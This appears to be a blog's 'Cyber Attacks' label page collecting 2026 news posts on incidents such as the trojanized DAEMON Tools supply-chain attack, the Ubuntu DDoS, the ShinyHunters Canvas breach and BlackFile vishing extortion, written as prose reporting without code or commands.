Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Cyber Attacks. Show all posts
Supply Chain Attack
Backdoor Malware Cyber Attacks cybersecurity threat DAEMON Tools information stealer Malware Campaign PowerShell Attack QUIC RAT Software Compromise Supply Chain Attack

Trojanized DAEMON Tools Used to Deploy Persistent Backdoor Malware


 

An innocent routine software update mechanism has been weaponized by attackers in order to distribute malware through official distribution channels, enabling a stealthy global supply-chain compromise. AVB Disc Soft authenticated digital certificates were used to sign trojanized builds as part of the operation that remained undetected for nearly a month. 

By bypassing conventional trust and endpoint security mechanisms, these malicious packages were able to avoid triggering immediate suspicion. Kaspersky discovered that the campaign began on April 8, 2026, and resulted in thousands of infections in over 100 countries before the breach was detected on May 1, 2026. 

Almost all infections were characterized by reconnaissance malware intended to gather system intelligence and establish persistence. However, a comparatively small number of carefully selected victims received advanced second-stage backdoors, suggesting a targeted attack on Russian, Belarusian, and Thai organizations involved in government, science, retail, and manufacturing.

Multiple core components of DAEMON Tools were modified, including DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe, and malicious functionality was embedded in versions 12.5.0.2421 through 12.5.0.2434, ensuring that execution occurs at startup while maintaining the appearance of legitimate software functionality.

According to the forensic analysis, the attackers had embedded their malicious framework within several trusted DAEMON Tools binaries, including the DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe that can be found within the installation directory of the application. Because the compromised binaries were signed by authentic AVB Disc Soft signing certificates, operating systems and endpoint security products perceived the compromised binaries as trustworthy, reducing the probability of immediate detection. 

It has been determined that every time the affected binaries are executed during system startup, the CRT initialization routine initiates hidden backdoor functionality, initiating a dedicated background thread aimed at quietly establishing outbound communication with attacker-controlled infrastructure during system startup. 

Throughout the attack, the malware repeatedly sent HTTP GET requests to a typosquatted domain that closely mimicked the legitimate DAEMON Tools download portal, as a method of mixing malicious traffic with expected software communications. According to WHOIS records, the fraudulent domain was registered on March 27, approximately one week before the supply chain intrusion occurred, indicating deliberate preparation of infrastructure prior to the attack by the campaign's operators. 

Based on an analysis of the command-and-control infrastructure, it appeared that compromised systems were able to receive remotely issued shell commands via cmd.exe and PowerShell, which would allow attackers to download and execute additional payloads dynamically. 

PowerShell's WebClient functionality was utilized to retrieve executable files from an Internet server located at 38.180.107[.]76 before silently executing them from temporary system directories and deleting all traces afterwards. In the course of the investigation, envchk.exe, a .NET-based information collector that researchers determined was intended to perform extensive reconnaissance on infected machines, was identified as one of the primary secondary payloads. 

In the malware's source code, embedded Chinese-language strings suggest that the malware's operators are probably Chinese-speaking, but no official affiliation has yet been established for the threat group. This reconnaissance utility collected a broad range of information regarding the host, including MAC addresses, hostnames, DNS domains, installed software inventories, running process lists, system locale configurations, and other host information. 

Following data collection, the collected data is transmitted back to attacker-controlled infrastructure via structured HTTP POST requests, providing the operators with a detailed profile of the compromised environment before deciding whether to escalate the intrusion. Unsuspecting users were infected when they downloaded and installed trojanized yet legitimately signed installers for DAEMON Tools, which executed malicious code contained within trusted application components without the user knowing it. 

After activation, the implanted payload established persistence mechanisms intended to survive reboots, as well as enabled the installation of a covert backdoor capable of communicating with remote attackers when the system is started. 

The command infrastructure was also capable of dynamically delivering additional malware stages based on the victim’s profile and operational significance. It is generally considered to have functioned as a reconnaissance-oriented information stealer tasked with gathering system identifiers, including hostnames, MAC addresses, running processes, installed applications, and locale configurations, before transmitting the harvested telemetry to the operators for the purpose of assessing the environment and prioritizing victims. 

The first-stage profiling phase of the investigation resulted in an evaluation of selected systems for further compromise. Using a lightweight backdoor that is capable of executing arbitrary commands, downloading files, and running malicious code directly in memory, selected systems were escalated to a second-stage compromise.

The attack on a Russian educational institution was escalated by the attackers by using QUIC RAT, a remote access malware strain capable of supporting a variety of communication protocols, as well as injecting malicious code into legitimate processes so that they could operate stealthily after the compromise. 

Despite utilizing software distributed through official channels, the DAEMON Tools breach remained undetected for nearly a month as a highly coordinated and technically mature supply-chain intrusion. An investigation into DAEMON Tools installations conducted on or after April 8 was advised to conduct extensive threat-hunting operations to monitor for abnormal system behavior and unauthorized network activity related to the compromise period. 

Researchers have avoided formally identifying the threat actor behind the campaign, but linguistic artifacts embedded within its first stage strongly suggest that Chinese-speaking operators were responsible. Following earlier compromises involving eScan, Notepad++, and CPU-Z, the incident also illustrates the rising trend of software supply-chain attacks throughout 2026. In parallel with these campaigns, the increasing importance of trusted software ecosystems becoming high-value attack surfaces for sophisticated threat groups continues to be demonstrated, including Trivy, Checkmarx, and Glassworm, which target software repositories, development packages, and browser extensions. 

The DAEMON Tools compromise proves that modern supply-chain attacks are not limited to niche targets or underground software ecosystems, but are increasingly exploiting widely used consumer and enterprise applications. The attackers developed their attack strategy by leveraging trusted software certificates and official distribution channels in order to disguise malicious activity as legitimate software behavior while quietly gaining access to potentially high-value environments across multiple countries. 

Security researchers have concluded that organizations must evolve beyond traditional trust-based security models and embrace continuous monitoring, behavioral detection, and software integrity validation practices that will enable them to identify malicious activity, even within applications that appear legitimate and have been signed. A contemporary supply-chain intrusion illustrates how a single compromised software update can quickly escalate into a global cyber risk with far-reaching operational and national security consequences.
Read more »
Election Security
Cyber Attacks Digital Infrastructure ECI Election Security

Election Commission Says ECINET Withstood Over 68 Lakh Cyberattack Attempts During Poll Counting

 



The Election Commission of India (ECI) said its digital election infrastructure faced more than 68 lakh malicious online hits on the day votes were counted for the recently concluded Assembly elections, with attempts originating from both domestic and overseas sources. According to election officials, the attacks targeted several online systems operated by the Commission, including the public election results portal, but were contained using existing cybersecurity protections.

Officials stated that despite the unusually high volume of hostile traffic, there was no disruption to counting operations or public access to election-related services.

The attacks were directed at ECINET, the Commission’s integrated election management platform that now combines over 40 separate election applications and digital portals into a unified system. The platform is used to manage multiple election-related functions, including monitoring, reporting, voter services, and administrative coordination.

On counting day, May 4, ECINET reportedly processed an average of nearly 3 crore hits every minute. Across all polling phases conducted on April 9, 23, and 29, the platform recorded a total traffic load of 98.3 crore hits, reflecting the scale at which India’s election infrastructure now operates digitally.

The Commission officially launched ECINET in January 2026 after testing its beta version during the Bihar Assembly elections in November 2025. Since then, the application has crossed 10 crore downloads, indicating rapid adoption among election officials, staff, and users accessing poll-related information and services.

Election authorities said the platform played a major operational role during the elections across five states and Union Territories, along with bypolls conducted during the same period. According to officials, ECINET enabled real-time monitoring of election activities, accelerated reporting processes, and improved administrative coordination between different election units. Authorities also said the centralized system helped increase transparency by reducing delays in communication and data sharing.

Cybersecurity analysts have repeatedly warned that election infrastructure has become an increasingly attractive target for malicious cyber activity because such systems process large amounts of real-time public information under intense public scrutiny. During counting periods, election portals often experience massive spikes in traffic as citizens, media organizations, and political workers continuously refresh result dashboards. Security researchers note that these high-traffic periods can also create opportunities for malicious actors to disguise harmful requests within normal user activity.

While the Election Commission did not disclose the technical nature of the 68 lakh malicious hits, such traffic typically includes automated bot requests, denial-of-service attempts, malicious scanning activity, or repeated unauthorized access attempts aimed at slowing systems or overwhelming servers.

The Commission also introduced a new QR code-based photo identity verification system for counting centres during the election process. On counting day alone, more than 3.2 lakh QR codes were generated through ECINET to regulate entry into counting venues. Officials said the system was introduced to ensure that only authorized personnel could enter restricted areas, reducing the possibility of unauthorized access at highly sensitive counting locations.

According to the Commission, this was the first time the QR-based access system had been deployed across all five states and Union Territories simultaneously. The ECI has now decided to adopt the system as a standard security measure for future Lok Sabha and state Assembly elections.

The increasing dependence on centralized digital infrastructure has pushed election management beyond traditional ballot security into the broader domain of cybersecurity, network resilience, identity verification, and real-time system monitoring. As more election operations move onto integrated digital platforms, experts say continuous monitoring and infrastructure hardening will become essential to maintaining uninterrupted electoral processes at national scale.

Read more »
Infrastructure Security
API Cyber Attacks Cybersecurity Attack DDoS DDOS Attacks Hacker attack Infrastructure Security

Ubuntu DDoS Attack Disrupts Installs Updates and Canonical Infrastructure

 

A wave of traffic overwhelmed systems, briefly halting downloads, patches, and web resources managed by Canonical - the team responsible for Ubuntu Linux. Outages stretched nearly twenty-four hours, blocking access to essential tools during the incident. 

Midway through the disruption, Canonical confirmed issues affecting its online systems, calling them a prolonged international cyber incident. With efforts already underway to bring functions back online, progress reports were expected later via verified sources after conditions improved. 

Not just external sites felt the impact - insights from casual chats on unaffiliated Ubuntu message boards pointed to deeper issues. Failures popped up across several core functions: the security API stumbled, repository access broke, setup tools froze, package upgrades failed. When the outage struck, countless machines could neither pull patches nor start clean installs. The ripple spread wider than first assumed. 

A claim of responsibility emerged afterward, attributed to an entity calling itself The Islamic Cyber Resistance in Iraq 313 Team. Supposed messages circulated on Telegram suggest they relied on a service named Beemed - one that facilitates distributed denial-of-service attacks - to execute the incident. While details remain sparse, the method points toward accessible cyber tools being leveraged for disruptive purposes. Heavy network floods emerge when tools like Beamed hand out DDoS power to anyone willing to pay, masking harm behind so-called "testing" labels. 

Instead of building safeguards, some misuse these setups to drown web systems in endless data streams. With advertised force climbing toward 3.5 terabits each second, one sees how readily extreme digital pressure becomes a purchasable option. A single flood of fake signals can overwhelm digital infrastructure when launched from countless hijacked gadgets online. 

Such an event forces critical systems to choke on excessive demand, blocking normal access. Real people experience delays or complete service failures as their requests get lost in chaos. Machines turned into unwilling helpers generate relentless noise instead of useful responses. Performance drops sharply once capacity limits are breached without warning. Genuine interactions fade under pressure from artificial congestion. 

Most times, hacking groups start by slipping malicious software onto gadgets, sometimes using poor login codes instead of strong ones. From there, machines already taken over get bundled together - forming massive clusters run from far away via command centers online. These hijacked setups often change hands in hidden digital bazaars; launching short outages becomes possible for cheap, while heavier assaults require deeper spending. 

What follows? Buyers pick time-limited chaos or go all-in for longer surges. Surprisingly, more DDoS attacks happen now due to widespread access to self-running malware that exploits weak device protections across countries. While strong networks may resist some threats, major companies still face interruptions since hackers pair huge bot-driven data floods with focused attack plans.  

The Ubuntu event underscores how fragile key open-source tools have become - tools that developers, businesses, and public agencies depend on worldwide. When update servers or security interfaces go offline briefly, ripple effects follow. Patching halts. System rollouts stall. All of this unfolds while digital attacks are already underway.
Read more »
website
Cyber Attacks DDOS Attack ransomware website

Ubuntu Services Remain Disrupted After DDoS Attack Targets Canonical Infrastructure

 



Several Ubuntu users reported problems installing updates and downloading packages after parts of Canonical’s infrastructure were disrupted during a Distributed Denial of Service (DDoS) attack. Canonical, the company behind the Ubuntu Linux distribution, confirmed that its online systems had been targeted.

In a statement released during the outage, Canonical said its web infrastructure was facing what it described as a sustained cross-border cyberattack and that teams were working to restore affected services. The company added that further updates would be shared through official channels once more information became available.

Discussions across Ubuntu community forums suggested that multiple services were affected during the incident, including Ubuntu’s security API and several Canonical-operated websites. Users also stated that software installations and system updates were temporarily unavailable or failing to complete properly.

Responsibility for the attack was later claimed by a group calling itself “The Islamic Cyber Resistance in Iraq 313 Team.” In Telegram posts attributed to the group, the attackers allegedly said they used a DDoS-for-hire platform known as “Beamed” to carry out the operation.

Beamed is described as a “booter” or “stresser” service, which are platforms that allow customers to pay for DDoS attacks. These services are often advertised as tools for testing website traffic capacity, although security researchers have repeatedly linked them to disruptive cyber operations. According to claims associated with the platform, Beamed is capable of generating attacks reaching 3.5 terabits per second, enough traffic to overwhelm major online infrastructure.

A DDoS attack works by flooding a server or network with enormous volumes of internet traffic from large numbers of connected devices at the same time. Once systems become overloaded, legitimate users may no longer be able to access websites, applications, or online services. Unlike ransomware campaigns or data breaches, the primary goal of most DDoS attacks is to interrupt availability rather than steal information directly.

To create these attack networks, threat actors typically compromise internet-connected devices using malware. Weak passwords, exposed systems, outdated software, and poorly secured smart devices are commonly targeted. Once infected, the devices become part of a botnet that can be remotely controlled through centralized management panels.

Access to these botnets is frequently sold through underground marketplaces and subscription-based services. Depending on the size and duration of the attack, prices can range from as little as $10 for lower-powered services to hundreds of dollars per month for larger and more persistent attacks.

The disruption drew attention within the open-source community because Ubuntu infrastructure is widely used across enterprise servers, development environments, cloud systems, and research institutions worldwide. Problems affecting package repositories or security update services can delay software deployments and patch management for organizations that rely on Ubuntu systems daily.

The incident also reflects how accessible DDoS-for-hire services have become over the past few years. Platforms offering attack infrastructure continue to reduce the technical barrier required to launch disruptive cyberattacks, allowing even low-skilled actors to rent large-scale attack capabilities for relatively small amounts of money.

Read more »
Windows 11
attack surface reduction Bitdefender Cyber Attacks Cyber Threats Cybersecurity LOLBins PowerShell Windows 11

Trusted Tools Becoming the New Cybersecurity Threat, Says Bitdefender Report

 

Cybersecurity threats are evolving rapidly, and according to recent findings, attackers are increasingly relying on tools that organizations already trust. In its latest analysis, Bitdefender highlighted that modern cyberattacks often resemble routine administrative activity rather than traditional malware-based intrusions.

In the earlier report titled “Your Biggest Security Risk Isn't Malware — It's What You Already Trust,” Bitdefender explained how commonly used utilities such as PowerShell, WMIC, netsh, Certutil, and MSBuild have become popular among cybercriminals. These tools are regularly used by IT teams for legitimate purposes, making malicious activity harder to detect. The company revealed that legitimate-tool misuse was identified in 84% of 700,000 high-severity incidents analyzed.

To help organizations address this growing concern, Bitdefender introduced a complimentary Internal Attack Surface Assessment program. Designed for companies with 250 or more employees, the 45-day assessment aims to identify risky tools, users, and endpoints that could potentially be exploited by attackers while ensuring normal business operations remain unaffected.

The company noted that a standard Windows 11 installation includes 133 unique living-off-the-land binaries (LOLBins) across 987 instances. In addition, Bitdefender Labs found that PowerShell was active on 73% of endpoints, often running silently through third-party applications. According to the report, this indicates that the issue is less about malware and more about excessive permissions and unrestricted tool access.

Industry trends also point toward a shift in cybersecurity strategy. Gartner predicts that preemptive cybersecurity measures will account for 50% of IT security spending by 2030, compared to less than 5% in 2024. It also forecasts that 60% of large enterprises will adopt dynamic attack surface reduction technologies by 2030, up from less than 10% in 2025.

The Internal Attack Surface Assessment operates in four phases over approximately 45 days using GravityZone PHASR, Bitdefender’s proactive hardening and attack surface reduction technology.

The process begins with behavioral learning, where PHASR studies activity patterns for each machine-user combination over roughly 30 days. Organizations then receive an Attack Surface Dashboard featuring an exposure score between 0 and 100, along with prioritized findings related to living-off-the-land binaries, remote administration tools, tampering utilities, cryptominers, and piracy software.

An optional reduction phase allows businesses to apply restrictions either manually or through PHASR’s Autopilot feature. Employees can request restored access through a built-in one-click approval system. The final review measures how much the organization’s attack surface has been reduced and identifies any unauthorized applications or shadow IT risks discovered during the process.

Bitdefender stated that some early-access customers managed to reduce their attack surface by more than 30% within the first month, while one organization reportedly achieved nearly 70% reduction after restricting LOLBins and remote administration tools.

The assessment is intended to benefit multiple stakeholders within an organization. CISOs receive measurable exposure data suitable for board-level reporting, while SOC teams and IT administrators can potentially reduce investigation workloads by eliminating unnecessary suspicious activity. Business leaders may also benefit from documented security improvements that align with regulatory, auditing, and cyber-insurance expectations.

Bitdefender concluded that security risks are no longer solely external threats but often exist within existing systems and trusted tools already present in enterprise environments
Read more »
Cybersecurity Precautions
AI cyberattacks AI cybersecurity AI Risks AI Systems Cyber Attacks Cyber Defenses Cybersecurity Precautions

AI-Driven Cyberattacks and Global Cybersecurity Shortages Raise Fears of an AI Bugocalypse

 

Artificial intelligence is rapidly transforming cyber warfare, with experts warning the world may already be entering an “AI bugocalypse.” Modern AI systems can identify hidden software flaws and weaponize them within hours — sometimes before vulnerabilities are even publicly disclosed. 

At the same time, a growing shortage of cybersecurity professionals is leaving governments, businesses, hospitals, and critical infrastructure increasingly exposed. Concerns intensified after Anthropic introduced Mythos Preview, an advanced AI model reportedly capable of finding thousands of vulnerabilities across major operating systems and web browsers. 

While about 40 organizations received early access to strengthen their defenses, most governments and smaller institutions remain without similar protection. Security researchers warn this imbalance is becoming dangerous. Wealthier organizations can patch systems quickly using advanced AI tools, while smaller entities struggle to keep pace. Because global digital infrastructure is tightly connected, a single weak point can trigger disruptions across banks, utilities, supply chains, and government systems. 

AI-powered attacks are accelerating worldwide. CrowdStrike reported an 89% rise in AI-enabled cyber incidents during 2025. Criminal groups now use AI to create phishing emails, deepfake audio, fake videos, malware, and automated attack programs. Even inexperienced attackers can launch complex cyber operations using publicly available AI platforms. Attack timelines have also collapsed dramatically. 

In 2018, organizations often had years between a vulnerability becoming known and hackers exploiting it. By 2024, that window had fallen to only a few hours, with some attacks occurring before official disclosures were even released. Experts say AI tools can now reverse-engineer software patches almost instantly, identify what flaw developers fixed, and generate working exploit code within minutes. 

Once created, those attacks can spread globally before many organizations even install the update. Critical infrastructure is increasingly at risk as well. Hospitals, schools, public agencies, power systems, and water networks have all become targets. Cyberattacks linked to Iran recently disrupted organizations across the Middle East, while fraud networks in Southeast Asia reportedly used AI tools to steal massive sums from victims in Europe and the United States. 

Meanwhile, the global shortage of cybersecurity professionals continues to grow, especially across heavily targeted Asia-Pacific regions. Experts warn companies can no longer rely solely on patching vulnerabilities after attacks begin. Instead, organizations must prepare for breaches in advance through stronger defenses, backups, response plans, and resilient system design. 

Even AI developers acknowledge no single company can solve the crisis alone. Researchers, governments, software firms, and cybersecurity teams worldwide will need deeper cooperation as AI-driven threats continue evolving. Specialists increasingly argue that cybersecurity must be treated as an essential global priority rather than a luxury available only to organizations with major resources.
Read more »
Hijacking attacks
Account Hijacking Risks Account security account takeover scams Cyber Attacks Cyber Hackers Cyber Phishing Hacker attack Hijacking attacks

Signal Plans New Security Measures After Russian Hackers Hijack Hundreds of Accounts

 

Following revelations that hackers tied to the Russian government breached numerous German users' accounts via focused phishing schemes, Signal, a secure messaging service, moves to strengthen its defenses. Though the core encryption stays intact, manipulation tactics targeting people - not systems - spark renewed alarm among experts. Some reports suggest around 300 people in 

Germany faced incidents, such as prominent politicians. 
The head of the German parliament ranked among them, showing a shift toward targeting authorities, campaigners, and well-known personalities. Though less common before, such actions now point to more deliberate choices by offenders. What happened did not involve any break-in at Signal’s core security setup. Their encryption methods stayed intact throughout the incidents. Hackers found another path - using deceptive messages aimed directly at people. 

These tricks led some users to hand over private login details without realizing it. The app itself remained untouched, including its built-in privacy safeguards. Reportedly, fake messages came from someone pretending to be "Signal Support," arriving straight in user inboxes. Instead of ignoring them, some people gave up their single-use login codes, personal Signal PINs, along with backup account information. 

With that data in hand, intruders then activated the targeted accounts on separate devices. Private conversations became reachable - all because stolen details allowed full transfer control. Earlier warnings came from security experts across Europe, along with U.S. agencies like the FBI, flagging such tactics recently. Phishing efforts resembling these have drawn attention due to their repeated appearance. 

Targets included individuals speaking out against China’s policies, according to reports. These patterns hint at coordinated monitoring backed by governmental support. Observers note the consistency in techniques points beyond random attacks. Human behavior plays a central role in these breaches, differing from conventional hacks targeting code flaws. 

Instead of cracking software defenses, intruders gain access by persuading individuals to disclose credentials. Once granted entry through trust rather than force, encrypted environments offer little resistance. Security analysts observe a shift: tricking people now works better than overcoming digital barriers. What used to require complex tools now succeeds with conversation. Now working on new protections, Signal aims to make scam detection easier for its users. 

Without revealing exact details, the team mentioned updates targeting phishing-driven breaches. These adjustments will start appearing within weeks. Changes are expected to limit how often accounts get compromised through deceptive messages. Although the group operating Signal emphasizes strong privacy safeguards, these very protections reduce how much information they can gather. 

Because messages are secured with end-to-end coding, personal chats remain hidden even from the service itself. Limited access to usage details means deeper inspection of scam attempts becomes difficult. Only minimal traces of activity stay visible, due to built-in system constraints. Later updates show Signal warning people: real support teams won’t message inside the app, on social platforms, by text, or call asking for logins, access codes, or personal IDs. 

Messages from the team arrive strictly via confirmed accounts ending in @signal.org, according to their statement. Communication like this stays limited - no exceptions appear. Despite strong encryption, hacking through stolen credentials shows weaknesses still exist at the human level. With scams now harder to spot, specialists stress vigilance alongside tools like two-step checks - protection depends on behavior, not code alone.
Read more »
Hacking Group
Cyber Attacks Cyber Outage Digital Learning E-learning Facebook Canvas Hacker attack Hacking Group

Canvas Learning Platform Outage Disrupts Universities After ShinyHunters Cyberattack

 

Midday classes hit pause when Canvas went offline nationwide following a security alert that triggered emergency repairs. Though the issue began in Texas, ripple effects reached campuses far outside, cutting off vital links to homework and recorded lectures. When servers dropped, so did access - assignments vanished from view, gradebooks locked tight. Some professors switched to paper handouts; others postponed deadlines without warning. 

By evening, partial functions returned, though glitches lingered like static on a radio. Not every login worked smoothly, leaving doubts about full recovery. Reports suggest a connection between the incident and ShinyHunters, a hacking collective lately seen exploiting cloud systems by leveraging weak points in external service providers. Though details remain limited, evidence traces back to prior attacks where stolen information was used as leverage against corporate networks. 

Instead of relying on brute force, the group often manipulates access flaws within shared digital environments. While some breaches go unnoticed at first, forensic analysis later reveals patterns matching earlier intrusions tied to similar tactics. Later came confirmation from Instructure - Canvas's developer - that the platform had entered temporary maintenance mode after the event unfolded. Though restoration of service remained possible, according to officials, institutions using the system faced urgent hurdles just when course activities demanded stability. 

Despite assurances, timing turned problematic for schools depending heavily on seamless access at a pivotal point in the term. Midway through the week, campuses like Southern Methodist University felt the strain as systems went offline. Not far behind, the University of North Texas System faced similar disruptions, slowing down daily functions. At Baylor University, staff worked under pressure - rescheduling classes became a priority. Meanwhile, Tarrant County College saw delays ripple across departments. With email and portals unreliable, instructors adapted on the fly while leadership tried to reconnect threads. 

Because updates lagged, many waited hours just to confirm basic plans. Final exams set for Friday at Southern Methodist University got pushed to Sunday after a widespread system failure left services down. Because of the same national disruption, Baylor University rescheduled its tests too, alerting learners that interruptions might stretch on without clear timing. Officials admitted they lacked answers about how long things would stay broken - access may return in hours or drag into multiple days. 

Across town, the University of North Texas System cut off broad access to Canvas until faculty and tech experts figured out next steps for ongoing classes, scores, and year-end tests. Farther south, Tarrant County College acknowledged its digital crews were checking the breach, watching for ripples among learners and workers alike. Unexpected outages reveal how tightly schools now rely on centralised online learning systems. 

Not only do tools such as Canvas support daily teaching tasks, but they also handle submission tracking, feedback cycles, and course materials distribution. Should access fail, functions stall - particularly under pressure, like mid-semester assessments. Interruptions expose fragile infrastructure beneath routine digital workflows. What stands out is how this event ties into a wider pattern - cyber gangs increasingly going after schools and companies that run online platforms. 

Though they hold vast collections of student records and private details, many learning organizations lack strong digital defenses. Because of these gaps, threat actors see them as easier wins when chasing ransom payments. Still probing the incident, campuses now shift toward regular classes - though officials stay alert for leaked data. This disruption highlights once more that when hackers strike common online systems, ripple effects hit countless people at many schools all at once.
Read more »
university cybersecurity attack
Canvas cyberattack Cyber Attacks Instructure Canvas breach ShinyHunters hack university cybersecurity attack

Canvas Cyberattack Disrupts Universities Nationwide, Thousands of Schools Potentially Impacted

 

A major cybersecurity breach has disrupted online learning systems at universities across the United States, including the University of Minnesota and University of Wisconsin, after hackers reportedly targeted Canvas, a widely used learning management platform owned by Instructure
.
The outage began Thursday evening, leaving students and faculty unable to access Canvas for coursework, assignments, grades, and communication tools. Online screenshots circulating on social media appear to show a message from the hacking group ShinyHunters claiming responsibility for the attack. The message allegedly advised affected institutions to “consult with a cyber advisory firm and contact us privately… to negotiate a settlement.”

A spokesperson for the University of Minnesota confirmed the incident in an official statement:

“The University of Minnesota was notified by Instructure, a software and technology supplier of the University, of a cybersecurity incident affecting its clients worldwide. As of today, users are unable to access Instructure’s Canvas system, which is a cloud- and web-based learning management system for online courses, learning materials and communications. University administrators are awaiting updates from the vendor and taking additional measures to protect University information.”

The University of Wisconsin also acknowledged being impacted by the widespread outage.

“At around 3 p.m. today, UW–Madison became aware we are part of a nationwide Canvas outage. We recognize this is occurring at a very challenging time during final exams and grading, and we’re committed to providing you with support and flexibility as we navigate this significant disruption. Multiple teams are working to address this issue.”

University officials further warned students not to respond to any suspicious prompts from Canvas, including requests to log in, click links, or reset passwords during the outage period.

Cybersecurity experts say attacks like this are becoming increasingly common because a single breach can affect thousands of institutions simultaneously. Adam Marre, chief information security officer at Arctic Wolf
, explained:

“Rather than target one institution, one victim, they can get many at once. So in this case, this Canvas software is one that’s used by thousands of educational institutions across the country and therefore it’s a way for these attackers to get highly leveraged on the victim to get them to pay money, so there’s lots of different victims and they can get lots of information with one attack.”

Marre also cautioned users to remain alert against phishing and social engineering attempts following the breach.

“They really need to watch out especially for social engineering attacks. These are the types of attacks that come as emails, texts, direct messages that look innocuous, but they’re really someone trying to trick you, defraud you, do something to further this crime, and so what they want to do is create a sense of urgency to get you to not think, not pause and just act quickly.”

He advised users to avoid clicking suspicious links, directly access platforms through official websites, and ensure multifactor authentication remains enabled on all accounts.

“When attackers get this kind of information or the kind of information that may be involved in this attack, things like emails, names, maybe direct messages, it’s good to remember attackers don’t always use this right away. Often they pause and wait sometimes even months before then using this in phishing attacks and other social engineering attacks.”
Marre added:

“We always need to be on guard when we’re online.”

Canvas is a widely adopted digital education platform used for assignments, lecture videos, grading systems, and academic communication. According to Luke Connolly, a threat analyst at Emisoft
, the hackers claimed that nearly 9,000 schools worldwide may have been affected, with billions of private messages and records potentially exposed.

Experts note that educational institutions have become prime targets for cybercriminals because of the vast amount of sensitive student and staff data they store digitally. Similar attacks in recent years have impacted the Minneapolis Public Schools and the Los Angeles Unified School District.

Connolly stated that the Canvas breach closely resembles a previous cyberattack involving PowerSchool
, another education technology provider. In that earlier incident, a college student from Massachusetts was charged in connection with the breach.

He further described ShinyHunters as a loosely organized group of teenagers and young adults based in the United States and the United Kingdom. The group has previously been linked to several high-profile cyberattacks, including one targeting Ticketmaster
, owned by Live Nation Entertainment
.

Read more »
Vishing Attack
BlackFile Extortion Cyber Attacks Hospitality Data Theft IT Impersonation Vishing Attack

BlackFile Extortion Gang Targets Retail and Hospitality Sectors

 

A new cyber threat actor known as BlackFile has emerged, launching data theft and extortion campaigns against retail and hospitality organizations since February 2026. Tracked also as CL-CRI-1116, UNC6671, and Cordial Spider, the group employs sophisticated vishing attacks by impersonating IT helpdesk staff via spoofed VoIP calls. This tactic preys on frontline employees, tricking them into revealing credentials on fake SSO login pages. 

BlackFile's attack chain begins with urgent phone calls claiming account security issues, directing victims to pixel-perfect phishing sites for credentials and MFA codes. Attackers then register rogue devices to bypass MFA, escalate privileges by scraping employee directories, and exploit SaaS APIs like Microsoft Graph and Salesforce to exfiltrate sensitive data. They target files with keywords such as "confidential," "SSN," or "salary," downloading massive volumes under legitimate-looking sessions. 

Unlike ransomware groups focused on encryption, BlackFile prioritizes pure extortion, leaking stolen data—including customer PII and employee records—on dark web sites before contacting victims. Demands reach seven figures, delivered via compromised emails or random Gmail addresses, with added pressure from psychological tactics like swatting executives. Researchers from Palo Alto Networks' Unit 42 link BlackFile with moderate confidence to "The Com," a network tied to broader cybercrimes.

The group's success exploits high staff turnover in retail and hospitality, where social engineering evades traditional defenses. RH-ISAC warns of rising incidents, noting similarities to groups like ShinyHunters. As SaaS platforms hold crown-jewel data, BlackFile signals a shift to "extortion-first" models, blending digital theft with real-world harassment. 

To counter BlackFile, organizations must enforce "callback" protocols—employees hang up and verify via internal lines—and audit SSO logs for suspicious device registrations. Regular social engineering training, API key rotations, and executive swatting briefings are essential for frontline resilience. Retail and hospitality firms ignoring these risks face multimillion-dollar breaches in 2026's volatile threat landscape.
Read more »
High Value Cybercrime
critical infrastructure attack Cyber Attacks Cyber Security Ransomware Attacks cyberattacks increase cybercriminals Ransomware Attack High Value Cybercrime

Targeted Ransomware Attacks Rise as Cybercriminals Shift Focus Toward High-Value Victims

 

Surprisingly, cyber attackers now prefer precision over volume, shifting from broad campaigns to targeted strikes meant to inflict severe damage on fewer targets. Although nationwide ransomware incidents declined in the UK last year, data collected by SonicWall reveals a rise in successful breaches across businesses. Instead of casting wide nets, hackers fine-tune their efforts, making each attempt harder to detect. 

What stands out is not the frequency of attacks but how many actually succeed. Focusing narrowly allows intruders to adapt quickly, exploiting specific weaknesses others might overlook. Eighty-seven percent fewer ransomware incidents were reported, though twenty percent more organizations faced breaches - a sign tactics have changed. Rather than casting wide nets, attackers now focus on specific companies with better odds of success or higher returns. Picking targets deliberately has become the norm, shifting away from mass campaigns toward precision strikes. 

One tactic draws attention by targeting firms with shaky safeguards - outdated systems, reliance on fragile operations. Called “big game hunting,” it zeroes in on weakness rather than strength. Smaller companies often find themselves in the line of fire. Breaches here frequently involve ransomware, showing up in 88% of cases. Larger organizations face such attacks less often, at only 39%. Vulnerability shapes who gets hit hardest. Older systems, sometimes called zombie tech, pose growing dangers according to security experts. 

Because updates stop for these outdated platforms, hackers find them easier targets - flaws linger without fixes. A case in point: a weakness first found ten years ago in Hikvision internet-connected cameras. In just twelve months across the UK, attackers tried to use this opening nearly 67 million times. About one out of every five break-in attempts logged by monitoring teams tied back to this issue alone. Surprisingly, few organizations grasp the duration attackers often stay undetected in their networks. 

Although the majority of IT leaders thought breaches would be spotted quickly - within hours - the data showed intruders typically lingered around 181 days. That mismatch, perception versus reality, opens space for malicious activity to unfold slowly, unnoticed. Quietly, threats spread across digital environments well before anyone responds. What once moved slowly now races forward - artificial intelligence fuels sharper rises in digital dangers. 

A surge appears: studies show nearly nine out of ten incidents involve AI-powered tools. Scanning nonstop, machines probe countless online points each moment, hunting weak spots. Speed becomes their weapon; defenses lag behind as holes get found quicker than fixes go live. Years go by, yet many organizations still run systems riddled with outdated flaws - perfect openings for digital intruders. 

Not only do skilled ransomware operators refine their tactics constantly, but they also rely on neglect: gaps known for ages stay unfixed. Danger grows quietly when precision strikes meet ignored risks. Small firms face just as much threat as large ones, simply because exposure piles up over time. Even basic protections often come too late, if at all. Though many still overlook it, keeping software up to date plays a key role in staying secure online. 

Instead of waiting for problems, frequent checks across networks help catch risks early. Some companies run into trouble simply because they trust aging tools too much. Old flaws thought harmless yesterday might open doors today. Attackers adapt quickly - especially those deploying tailored ransomware attacks. As these threats grow sharper, so does the risk for unprepared teams.
Read more »
User Security
Cyber Attacks Financial Scam Srilanka User Security

Sri Lanka Finance Ministry Loses $2.5 Million in Cyberattack on Payment System

 

